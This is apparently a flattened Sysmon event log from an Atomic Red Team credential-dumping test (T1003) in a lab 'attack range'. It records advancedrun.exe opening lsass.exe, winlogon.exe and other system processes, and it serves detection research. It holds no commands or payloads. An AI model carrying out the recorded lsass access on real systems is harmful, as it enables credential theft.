17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003943935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 